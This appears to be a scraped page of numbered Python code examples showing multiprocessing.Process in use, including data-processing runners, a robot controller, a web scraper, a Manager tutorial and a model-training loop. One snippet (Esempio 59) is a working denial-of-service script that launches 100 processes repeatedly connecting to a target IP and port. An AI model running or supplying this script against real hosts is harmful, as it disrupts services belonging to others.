        #-----------------------------------------------------------------------
        process_id = 0
        start_allowed = True
        cat_finished = False
        queue = JoinableQueue()
        start_date_o = datetime.strptime(Velo.start_date, "%m/%d/%Y").date()
        end_date_o = datetime.strptime(Velo.end_date, "%m/%d/%Y").date()

        s_p_d = Velo.f_dates_of_id_sub_proc
        Multiprocess.process_cnt = len(s_p_d)
        Velo.process_cnt = Multiprocess.process_cnt

        if Multiprocess.process_cnt > Multiprocess.cpu_cnt:
            Velo.logger.error(
                "Too many processes ({}) for only {} cpu's!".format(
                    Multiprocess.process_cnt,
                    Multiprocess.cpu_cnt,
                ))
            exit(-1)

        # setup processes/instances---------------------------------------------
        for date in range(Multiprocess.process_cnt):
            date_period = s_p_d[date][2]
            if date_period <= 0:
                continue

            queue_evnt = JoinableQueue()
            process = []
            process_name = "process_{:03d}".format(process_id)
            process_inst = None

            if Multiprocess.test_level == 0:
                process_inst = Velo(
                    process_id=process_id,
                    process_name=process_name,
                    queue=queue,
                    queue_evnt=queue_evnt,
                    date_id=date,
                )

            if Multiprocess.test_level == -1:
                process_inst = MultiprocessTest(
                    process_id=process_id,
                    process_name=process_name,
                    queue_evnt=queue_evnt,
                    queue=queue,
                    date_id=date,
                )

            process = Process(target=process_inst.run)

            Multiprocess.process_instances.append(process_inst)
            Multiprocess.processes.append(process)
            Multiprocess.process_result.append([])
            Multiprocess.queue_evnt.append(queue_evnt)

            for stage_id in range(Multiprocess.stage_fin):
                Multiprocess.process_result[-1].append(None)

            process_id += 1

        thread_subprocess_manage = Thread(
            target=subprocess_manage,
            args=(queue, ),
        )

        thread_concatenate = []

        #for stage_id in range(Multiprocess.stage_fin):
        thread_concatenate.append(
            Thread(
                target=concatenate,
                args=(
                    #stage_id,
                    1, ),
            ))

        thread_subprocess_manage.start()

        #--concatenate all consecutive results----------------------------------
        for thread in thread_concatenate:
            thread.start()

        for thread in thread_concatenate:
            thread.join()

        # getting final results-------------------------------------------------
        process_result_cat = Multiprocess.process_result_cat_fin

        thread_subprocess_manage.join()

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.run_subprocessed",
        ))

        return process_result_cat
Esempio n. 53
0
        # First Step doesn't contain jointAngles
        if len(jointAngles):
            # Real Actuators
            controller.servoRotate(jointAngles)
            
            # # Plot Robot Pose into Matplotlib for Debugging
            # TODO: Matplotplib animation
            # kn.initFK(jointAngles)
            # kn.plotKinematics()

        robot.step()
        consoleClear()


if __name__ == "__main__":
    try:
        # Keyboard input Process
        KeyInputs = KeyInterrupt()
        KeyProcess = Process(target=KeyInputs.keyInterrupt, args=(1, KeyInputs.key_status, KeyInputs.command_status))
        KeyProcess.start()

        # Main Process 
        main(2, KeyInputs.command_status)
        
        print("terminate KeyBoard Input process")
        if KeyProcess.is_alive():
            KeyProcess.terminate()
    except Exception as e:
        print(e)
    finally:
        print("Done... :)")
Esempio n. 54
0
    def test_concat():
        """
        This function provides means to test the correct functioning of the
        concatenation of the subprocess results.
        """
        def get_data_for_df_test(
            start_date,
            end_date,
        ):
            """
            """
            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            #-------------------------------------------------------------------
            test = Multiprocess.test_level
            process_id = 0
            process_instances_ret = []
            queue = JoinableQueue()
            queue_evnt = JoinableQueue()
            date_format = "%m/%d/%Y"

            for date in range(3):
                end_date_o = datetime.strptime(
                    end_date[date],
                    date_format,
                ).date()
                start_date_o = datetime.strptime(
                    start_date[date],
                    date_format,
                ).date()

                process_name = "process_{:03d}".format(process_id)

                process_inst = Velo(
                    process_id=process_id,
                    process_name=process_name,
                    queue=queue,
                    queue_evnt=queue_evnt,
                    date_id=date,
                )

                process = Process(target=process_inst.run)

                process_id += 1
                Multiprocess.process_cnt += 1
                Multiprocess.process_instances.append(process_inst)
                Multiprocess.processes.append(process)

            for i in range(Multiprocess.process_cnt):
                Multiprocess.processes[i].start()

            for i in range(Multiprocess.process_cnt):
                msg_from_queue = queue.get()
                msg_stage_id = msg_from_queue[0]
                msg_process_id = msg_from_queue[1]
                process_instances_ret.append(msg_from_queue[2])
                queue.task_done()

                Multiprocess.processes[msg_process_id].join()

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            return process_instances_ret

        def ds_cmp(
            test_number,
            test_name,
            ds_a_a,
            ds_a_b,
            ds_b,
        ):
            """
            Takes two data structures ds_a_a, ds_a_b, merges them (ds_a) and
            compares ds_a with a third data structure ds_b by comparing their
            md5 hashes.
            """
            def ds_to_list(ds):
                """
                This function transforms a given data structure to a list.
                """
                l_ds = None
                if isinstance(ds, list):
                    l_ds = ds
                elif isinstance(ds, ndarray):
                    Multiprocess.logger.debug(
                        "test #[{}]:  ds_a_a type = {}".format(
                            test_number, str(type(ds_a_a))))
                    l_ds = ds.tolist()
                else:
                    l_ds = ds.tolist()

                return l_ds

            def ds_export(
                ds,
                version,
                test_number,
            ):
                """
                This function exports a given data
                structure to a text file.
                """
                path_data_output_l = "{}_ds/ds_{}_{}.txt".format(
                    Multiprocess.path_data_output,
                    test_number,
                    version,
                )
                with open(path_data_output_l, 'w') as text_file:
                    text_file.write("{}".format(ds))

                return

            def ds_hash_cmp(
                s_ds_a,
                s_ds_b,
            ):
                """
                This function computes the md5 hashes of two given data structures
                in the form of strings and compares them.
                """
                hash_a = md5()
                hash_b = md5()

                hash_a.update(str.encode(s_ds_a))
                hash_b.update(str.encode(s_ds_b))

                s_hash_a = hash_a.hexdigest()
                s_hash_b = hash_b.hexdigest()

                if s_hash_a == s_hash_b:
                    return True

                return False

            path_data_output = Multiprocess.path_data_output
            ds_a = None

            #derive ds_a from a_a and a_b
            ds_a_a_bak = ds_a_a

            if type(ds_a_a) == list:
                ds_a = ds_a_a + ds_a_b

            elif type(ds_a_a) == DatetimeIndex:
                ds_a = ds_a_a_bak.append(ds_a_b)

            elif type(ds_a_a) == str:
                ds_a = "{}, {}".format(ds_a_a[0:-1], ds_a_b[1:])

            else:
                ds_a = concatenate([ds_a_a, ds_a_b])

            s_ds_a_a = None
            s_ds_a_b = None
            s_ds_a = None
            s_ds_b = None

            #transform to list
            if type(ds_a_a) != str:
                s_ds_a_a = str(ds_to_list(ds_a_a))
                s_ds_a_b = str(ds_to_list(ds_a_b))
                s_ds_a = str(ds_to_list(ds_a))
                s_ds_b = str(ds_to_list(ds_b))
            else:
                s_ds_a_a = ds_a_a
                s_ds_a_b = ds_a_b
                s_ds_a = ds_a
                s_ds_b = ds_b

            #put each tx in newline
            s_ds_a_a = s_ds_a_a.replace("), Tx(", "),\nTx(")
            s_ds_a_b = s_ds_a_b.replace("), Tx(", "),\nTx(")
            s_ds_a = s_ds_a.replace("), Tx(", "),\nTx(")
            s_ds_b = s_ds_b.replace("), Tx(", "),\nTx(")

            #export to file
            ds_export(s_ds_a_a, "_a_a", test_number)
            ds_export(s_ds_a_b, "_a_b", test_number)
            ds_export(s_ds_a, "_a", test_number)
            ds_export(s_ds_b, "_b", test_number)

            #hashing
            hash_equal = None
            if ds_hash_cmp(s_ds_a, s_ds_b) == True:
                hash_equal = "{}Y{}".format(cs.PRGnBH, cs.WHI)
            else:
                hash_equal = "{}N{}".format(cs.REE, cs.WHI)

            ret_str_pre = "{}[{}testing cat #{}{}]".format(
                cs.WHI,
                cs.PRGnBH,
                test_number,
                cs.WHI,
            )
            ret_str = "{}  {}same: [{}] -- {}{}".format(
                ret_str_pre,
                cs.WHI,
                hash_equal,
                test_name,
                cs.RES,
            )

            Multiprocess.logger.info(ret_str)
            return

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.test_concat",
        ))

        #-----------------------------------------------------------------------
        path_data_output = Multiprocess.path_data_output
        #start_date_a_a = "01/01/2010"
        #end_date_a_a   = "02/01/2011"

        #start_date_a_b = "02/02/2011"
        #end_date_a_b   = "03/01/2012"

        #start_date_b   = "01/01/2010"
        #end_date_b     = "03/01/2012"

        start_date_a_a = "01/03/2009"
        end_date_a_a = "02/01/2010"

        start_date_a_b = "02/02/2010"
        end_date_a_b = "02/01/2011"

        start_date_b = start_date_a_a
        end_date_b = end_date_a_b

        ret = get_data_for_df_test(
            start_date=[start_date_a_a, start_date_a_b, start_date_b],
            end_date=[end_date_a_a, end_date_a_b, end_date_b],
        )

        processes_test = []

        ret_cnt = len(ret[0])
        ret_keys = list(ret[0].keys())
        for i in range(ret_cnt):
            test_number = "{:02d}".format(i + 1)
            i_name = ret_keys[i]

            process = Process(target=ds_cmp,
                              args=(
                                  test_number,
                                  i_name,
                                  ret[0][i_name],
                                  ret[1][i_name],
                                  ret[2][i_name],
                              ))

            processes_test.append(process)

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.test_concat.ds_cmp",
        ))

        #start ds_cmp subprocesses----------------------------------------------
        for i in range(ret_cnt):
            processes_test[i].start()

        for i in range(ret_cnt):
            processes_test[i].join()

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Finished       ]".format(cs.WHI),
            "Multiprocess.test_concat.ds_cmp",
        ))

        #status message---------------------------------------------------------
        print("Exiting Multiprocess test: concat")
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Finished       ]".format(cs.WHI),
            "Multiprocess.test_concat",
        ))

        return
Esempio n. 55
0
def encode(model, opt):
    global read_id_list, log_probs_list, output_lengths_list, row_num_list
    manager = Manager()
    # read_id_list = manager.list()
    # log_probs_list = manager.list()
    # output_lengths_list = manager.list()
    # row_num_list = manager.list()
    encode_mutex = manager.Value('i', 1)
    decode_mutex = manager.Value('i', 1)
    write_mutex = manager.Value('i', 1)

    model.eval()
    call_dataset = CallDataset(opt.records_dir)
    data_iter = Data.DataLoader(
        dataset=call_dataset, batch_size=1, num_workers=0)
    if not os.path.exists(opt.output):
        os.makedirs(opt.output)
    else:
        shutil.rmtree(opt.output)
        os.makedirs(opt.output)
    outpath = os.path.join(opt.output, 'call.fasta')
    encoded_read_num = 0
    for batch in tqdm(data_iter):
        read_id, signal = batch
        read_id = read_id[0]
        signal = signal[0]
        read_id_list.append(read_id)
        signal_segs = signal.shape[0]
        row_num = 0
        encoded_read_num += 1
        while encode_mutex.value != 1:
            time.sleep(0.2)
        for i in range(signal_segs // 10 + 1):
            if i != signal_segs // 10:
                signal_batch = signal[i * 10:(i + 1) * 10]
            elif signal_segs % 10 != 0:
                signal_batch = signal[i * 10:]
            else:
                continue
            signal_batch = torch.FloatTensor(
                signal_batch).to(opt.device)
            signal_lengths = signal_batch.squeeze(
                2).ne(Constants.SIG_PAD).sum(1)
            output, output_lengths = model(
                signal_batch, signal_lengths)

            log_probs = output.log_softmax(2)
            row_num += signal_batch.size(0)
            log_probs_list.append(log_probs.cpu().detach())
            output_lengths_list.append(output_lengths.cpu().detach())
        row_num_list.append(row_num)
        if encoded_read_num == 100:
            encode_mutex.value = 0
            p = Process(target=decode_process, args=(
                outpath, encode_mutex, decode_mutex, write_mutex))
            p.start()
            while encode_mutex.value != 1:
                time.sleep(0.2)
            read_id_list[:] = []
            log_probs_list[:] = []
            output_lengths_list[:] = []
            row_num_list[:] = []
            encoded_read_num = 0
    if encoded_read_num > 0:
        encode_mutex.value = 0
        while decode_mutex.value != 1:
            time.sleep(0.2)
        p = Process(target=decode_process, args=(
            outpath, encode_mutex, decode_mutex, write_mutex))
        p.start()
        p.join()
Esempio n. 56
0
    def setUpClass(cls):
        global server_process
        server_process = Process(target=start_test_server)
        server_process.daemon = True
        server_process.start()
Esempio n. 57
0
File: am3.py Progetto: xtwxfxk/left5
def start():
    # for file in os.listdir(KEYWORD_PATH):
    #     # print(open(os.path.join(KEYWORD_PATH, file)).readlines())
    #     keywords.extend([k.strip() for k in open(os.path.join(KEYWORD_PATH, file)).readlines() if k.strip()])
    # start_list()
    # start_asins()

    # sa.fetch_product('B09KWZXG2N')

    list_p = Process(target=do_list)
    list_p.start()

    product1_p = Process(target=do_product,
                         args=(('D://profiles//amazon_product'), ))
    product1_p.start()
    product2_p = Process(target=do_product,
                         args=(('D://profiles//amazon_product1'), ))
    product2_p.start()

    sa1 = SpiderAmazon(list_queue, product_queue, record_queue, csv_queue)
    record_p = Process(target=sa1.do_records)
    record_p.start()

    sa2 = SpiderAmazon(list_queue, product_queue, record_queue, csv_queue)
    csv_p = Process(target=sa2.do_csv)
    csv_p.start()

    # executor = ProcessPoolExecutor(max_workers=5)
    # executor.submit(do_list)

    # sa = SpiderAmazon(list_queue, product_queue, record_queue, csv_queue)
    # executor.submit(do_product, 'D://profiles//amazon_product')
    # executor.submit(do_product, 'D://profiles//amazon_product1')
    # executor.submit(sa.do_records)
    # executor.submit(sa.do_csv)

    for file in os.listdir(KEYWORD_PATH):
        try:
            for keyword in open(os.path.join(KEYWORD_PATH, file),
                                'r',
                                encoding='utf-8').readlines():
                list_queue.put(keyword.strip())
        except Exception as ex:
            logger.error(ex, exc_info=True)

    list_p.join()
    product1_p.join()
    product2_p.join()
    record_p.join()
    csv_p.join()
    
"""

# Server process
# The manager object returned by Manager() controls a server process that holds Python objects
# and lets other processes manipulate them through proxies.
# A manager returned by Manager() supports the types list, dict, Namespace, Lock, RLock, Semaphore,
# BoundedSemaphore, Condition, Event, Barrier, Queue, Value and Array.
from multiprocessing import Process, Manager


def f(d, l):
    d[1] = '1'
    d['2'] = 2
    d[0.25] = None
    l.reverse()


if __name__ == '__main__':
    with Manager() as manager:
        d = manager.dict()
        l = manager.list(range(10))

        p = Process(target=f, args=(d, l))
        p.start()
        p.join()

        print(d)
        print(l)

# Server process managers are more flexible than shared memory objects, because they can
# support arbitrary object types. In addition, a single manager can be shared over a network
# by processes on different computers. However, they are slower than shared memory.
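
# A minimal sketch of the "shared over a network" point above, using
# multiprocessing.managers.BaseManager to expose a queue that a process on
# another machine can use through a proxy. Host name, port and authkey below
# are illustrative assumptions, not values taken from this example.
from multiprocessing.managers import BaseManager
from queue import Queue

shared_queue = Queue()


class QueueManager(BaseManager):
    pass


# Server side: register a callable returning the queue and serve it over TCP.
QueueManager.register('get_queue', callable=lambda: shared_queue)


def serve_queue(port=50000):
    manager = QueueManager(address=('', port), authkey=b'change-me')
    server = manager.get_server()
    server.serve_forever()


# Client side (conceptually a separate script on another machine): connect to
# the server and use the proxied queue like a local one.
class RemoteQueueManager(BaseManager):
    pass


RemoteQueueManager.register('get_queue')


def put_remote(host='server.example.com', port=50000):
    manager = RemoteQueueManager(address=(host, port), authkey=b'change-me')
    manager.connect()
    manager.get_queue().put('hello from a remote process')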
Esempio n. 59
0
import socket
from time import sleep
import sys
from multiprocessing import Pool, Process


def make_dos(ip,port):
    while True:
        with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:
            try:
                s.connect((ip,port))
                s.send(bytes(1))
            except:
                pass
        sleep(0.1)

if __name__ == "__main__":
    ip = sys.argv[1]
    port = int(sys.argv[2])
    for i in range(100):
        p = Process(target=make_dos,args=(ip,port))
        p.start()
    print(f'DOS attack on {ip}:{port} was started')
    input()

Esempio n. 60
0
            'relation_embedding': d[min_id][2]
        })


if __name__ == '__main__':
    if len(os.listdir('../data/train_data2/')):
        num = len(os.listdir('../data/train_data2/'))
    else:
        num = 1
    while num < 7:
        manager = Manager()
        d = manager.dict()
        jobs = []
        for i in range(1, 5):
            path = "../data/FB15k-" + str(i)
            jobs.append(
                Process(target=transe,
                        args=(i, path, 100, 1, 'L1', 10000, 0.003, 12, 12, 50,
                              d)))
        for j in jobs:
            j.start()
        for j in jobs:
            j.join()
        print('-------- round {} ---------'.format(num))
        record(d, num)
        num += 1
    # path = "../data/FB15k-1"
    # p = Process(target=transe, args=(1,path,100,1,'L1',10000,0.003,12,12,3,d))
    # p.start()
    # p.join()